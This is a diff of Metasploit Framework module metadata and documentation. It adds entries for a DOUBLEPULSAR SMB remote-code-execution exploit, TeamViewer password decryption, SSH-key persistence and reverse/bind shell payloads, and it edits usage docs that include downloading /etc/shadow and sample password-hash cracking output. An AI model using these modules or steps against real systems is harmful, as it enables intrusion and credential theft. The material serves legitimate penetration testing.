-      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
-      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
-      "URL-https://github.com/countercept/doublepulsar-detection-script",
-      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
-      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
-    ],
-    "platform": "Windows",
-    "arch": "x64",
-    "rport": 445,
-    "autofilter_ports": [
-      139,
-      445
-    ],
-    "autofilter_services": [
-      "netbios-ssn",
-      "microsoft-ds"
-    ],
-    "targets": [
-      "Execute payload",
-      "Neutralize implant"
-    ],
-    "mod_time": "2019-11-25 18:26:37 +0000",
-    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
-    "is_install_path": true,
-    "ref_name": "windows/smb/doublepulsar_rce",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "AKA": [
-        "DOUBLEPULSAR"
-      ],
-      "RelatedModules": [
-        "auxiliary/scanner/smb/smb_ms17_010",
-        "exploit/windows/smb/ms17_010_eternalblue"
-      ],
-      "Stability": [
-        "crash-os-down"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ]
-    },
-    "needs_cleanup": null
-  },
   "exploit_windows/smb/generic_smb_dll_injection": {
     "name": "Generic DLL Injection From Shared Resource",
     "fullname": "exploit/windows/smb/generic_smb_dll_injection",
@@ -140001,6 +140293,78 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/smb/smb_doublepulsar_rce": {
+    "name": "SMB DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/smb/smb_doublepulsar_rce",
+    "aliases": [
+      "exploit/windows/smb/doublepulsar_rce"
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "zerosum0x0",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Jacob Robles"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "MSB-MS17-010",
+      "CVE-2017-0143",
+      "CVE-2017-0144",
+      "CVE-2017-0145",
+      "CVE-2017-0146",
+      "CVE-2017-0147",
+      "CVE-2017-0148",
+      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
+      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
+      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
+      "URL-https://github.com/countercept/doublepulsar-detection-script",
+      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-02-03 11:19:20 +0000",
+    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/smb/smb_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/smb/smb_ms17_010",
+        "exploit/windows/smb/ms17_010_eternalblue"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/smb/smb_relay": {
     "name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
     "fullname": "exploit/windows/smb/smb_relay",
@@ -143874,7 +144238,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-01-03 18:43:51 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -143907,7 +144271,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_inetd",
@@ -143976,7 +144340,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-16 12:11:28 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_lua",
@@ -144011,7 +144375,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat",
@@ -144044,7 +144408,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -144077,7 +144441,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -144144,7 +144508,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_perl",
@@ -144178,7 +144542,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -144244,7 +144608,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_ruby",
@@ -144277,7 +144641,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -144310,7 +144674,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_socat_udp",
@@ -144410,7 +144774,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/generic.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/generic",
@@ -144542,7 +144906,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse",
@@ -144610,7 +144974,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-07-10 18:34:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_bash",
@@ -144677,7 +145041,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-05-24 16:33:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_bash_udp",
@@ -144779,7 +145143,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_lua",
@@ -144847,7 +145211,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_netcat",
@@ -144880,7 +145244,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -144946,7 +145310,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_openssl",
@@ -144979,7 +145343,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_perl",
@@ -145012,7 +145376,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 19:09:07 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -145045,7 +145409,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-19 15:49:46 +0000",
+    "mod_time": "2019-10-13 19:09:07 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_php_ssl",
@@ -145078,7 +145442,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_python",
@@ -145177,7 +145541,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_ruby",
@@ -145243,7 +145607,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_socat_udp",
@@ -145277,7 +145641,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -145412,7 +145776,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
     "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/bind_lua",
@@ -162919,7 +163283,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-15 14:35:38 +0000",
     "path": "/modules/post/linux/gather/enum_system.rb",
     "is_install_path": true,
     "ref_name": "linux/gather/enum_system",
@@ -165997,7 +166361,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-24 05:06:20 +0000",
+    "mod_time": "2020-02-13 16:17:33 +0000",
     "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
     "is_install_path": true,
     "ref_name": "osx/gather/password_prompt_spoof",
@@ -168185,6 +168549,40 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/gather/credentials/teamviewer_passwords": {
+    "name": "Windows Gather TeamViewer Passwords",
+    "fullname": "post/windows/gather/credentials/teamviewer_passwords",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nic Losby <blurbdust@gmail.com>"
+    ],
+    "description": "This module will find and decrypt stored TeamViewer passwords",
+    "references": [
+      "CVE-2019-18988",
+      "URL-https://whynotsecurity.com/blog/teamviewer/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-07 10:07:41 +0000",
+    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/teamviewer_passwords",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/gather/credentials/tortoisesvn": {
     "name": "Windows Gather TortoiseSVN Saved Password Extraction",
     "fullname": "post/windows/gather/credentials/tortoisesvn",
@@ -169435,7 +169833,7 @@
       "zeroSteiner <zeroSteiner@gmail.com>",
       "mubix <mubix@hak5.org>"
     ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
+    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.",
     "references": [
       "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
     ],
@@ -169445,7 +169843,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-02-02 15:33:48 +0000",
+    "mod_time": "2020-01-14 20:49:39 +0000",
     "path": "/modules/post/windows/gather/enum_patches.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/enum_patches",
@@ -170272,7 +170670,7 @@
     ],
     "description": "This module will change a registry value to enable\n        the sending of LM challenge hashes and then initiate a SMB connection to\n        the SMBHOST datastore. If an SMB server is listening, it will receive the\n        NetLM hashes",
     "references": [
-      "URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks"
+      "URL-https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks"
     ],
     "platform": "",
     "arch": "",
@@ -170280,7 +170678,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-28 20:35:57 +0000",
     "path": "/modules/post/windows/gather/netlm_downgrade.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/netlm_downgrade",
@@ -171257,6 +171655,40 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/manage/install_ssh": {
+    "name": "Install OpenSSH for Windows",
+    "fullname": "post/windows/manage/install_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "references": [
+      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
+      "URL-https://github.com/PowerShell/openssh-portable"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-01-19 19:51:44 +0000",
+    "path": "/modules/post/windows/manage/install_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/manage/killav": {
     "name": "Windows Post Kill Antivirus and Hips",
     "fullname": "post/windows/manage/killav",
@@ -171303,7 +171735,8 @@
     "disclosure_date": null,
     "type": "post",
     "author": [
-      "Carlos Perez <carlos_perez@darkoperator.com>"
+      "Carlos Perez <carlos_perez@darkoperator.com>",
+      "phra <https://iwantmore.pizza>"
     ],
     "description": "This module will migrate a Meterpreter session from one process\n        to another. A given process PID to migrate to or the module can spawn one and\n        migrate to that newly spawned process.",
     "references": [
@@ -171315,7 +171748,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-17 16:39:18 +0000",
     "path": "/modules/post/windows/manage/migrate.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/migrate",
@@ -172046,7 +172479,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-12-12 15:19:17 +0000",
+    "mod_time": "2019-12-18 16:05:37 +0000",
     "path": "/modules/post/windows/manage/shellcode_inject.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/shellcode_inject",
@@ -172057,6 +172490,39 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/manage/sshkey_persistence": {
+    "name": "SSH Key Persistence",
+    "fullname": "post/windows/manage/sshkey_persistence",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Dean Welch <dean_welch@rapid7.com>"
+    ],
+    "description": "This module will add an SSH key to a specified user (or all), to allow\n          remote login via SSH at any time.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-05 16:21:38 +0000",
+    "path": "/modules/post/windows/manage/sshkey_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/sshkey_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/manage/sticky_keys": {
     "name": "Sticky Keys Persistance Module",
     "fullname": "post/windows/manage/sticky_keys",

documentation/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.md

@@ -56,7 +56,7 @@ All of the leaked versions are available in the module
 
 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`

documentation/modules/auxiliary/admin/cisco/cisco_dcnm_download.md

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.
 
-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios
 
 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!
 

documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec

documentation/modules/auxiliary/admin/http/cnpilot_r_fpt.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.
 
 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt

documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md

@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec

documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md

@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass

documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md

@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid
 
 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
 
-## Sample Output
+## Scenarios
 
 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 

documentation/modules/auxiliary/admin/scada/phoenix_command.md

@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```
 
-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options
 

documentation/modules/auxiliary/analyze/jtr_aix.md

@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
-----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_linux.md

@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
